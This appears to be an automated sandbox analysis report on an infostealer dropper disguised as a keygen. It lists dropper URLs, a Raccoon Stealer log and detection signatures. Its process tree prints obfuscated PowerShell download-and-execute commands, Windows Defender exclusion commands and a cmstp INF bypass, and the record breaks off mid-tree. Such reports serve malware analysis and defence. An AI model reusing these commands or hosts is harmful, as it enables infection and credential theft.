Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    151s
  • max time network
    138s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    02-10-2020 21:14

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (84) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 23:40:55 GMT Bot_ID: 750D7400-3B08-415E-A8B0-2695D81425F5_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: UCQFZDUI - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (460 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 50 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (84) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (84) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:880
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\8C48.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (84) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1768
      • C:\Users\Admin\AppData\Local\Temp\8C48.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1840
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8C48.tmp\m.hta"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1892
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:628
          • C:\Users\Public\qub.exe
            "C:\Users\Public\qub.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2564
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2736
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2852
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2852 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\404378464556935\\* & exit
                  8⤵
                    PID:3052
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2852
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2712
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2768
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2124
              • C:\Users\Public\qub.exe
                "C:\Users\Public\qub.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Modifies system certificate store
                PID:2880
                • C:\Users\Admin\AppData\Local\Temp\rOAv8Mp2bB.exe
                  "C:\Users\Admin\AppData\Local\Temp\rOAv8Mp2bB.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2560
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\rOAv8Mp2bB.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2336
                • C:\Users\Admin\AppData\Local\Temp\RWD8TjIgIx.exe
                  "C:\Users\Admin\AppData\Local\Temp\RWD8TjIgIx.exe"
                  7⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  PID:844
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:2212
                  • C:\Users\Admin\AppData\Local\Temp\4N551snBw9.exe
                    "C:\Users\Admin\AppData\Local\Temp\4N551snBw9.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:1752
                    • \??\c:\windows\SysWOW64\cmstp.exe
                      "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\mbilhtr1.inf
                      8⤵
                        PID:1520
                    • C:\Users\Admin\AppData\Local\Temp\PgJx5zzNsk.exe
                      "C:\Users\Admin\AppData\Local\Temp\PgJx5zzNsk.exe"
                      7⤵
                      • Executes dropped EXE
                      • Windows security modification
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1944
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" Get-MpPreference -verbose
                        8⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2848
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\qub.exe"
                      7⤵
                        PID:2208
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /T 10 /NOBREAK
                          8⤵
                          • Delays execution with timeout.exe
                          PID:1392
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8C48.tmp\m1.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:1116
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:824
              • C:\Windows\SysWOW64\timeout.exe
                timeout 1
                3⤵
                • Delays execution with timeout.exe
                PID:1900
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8C48.tmp\b.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:1800
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
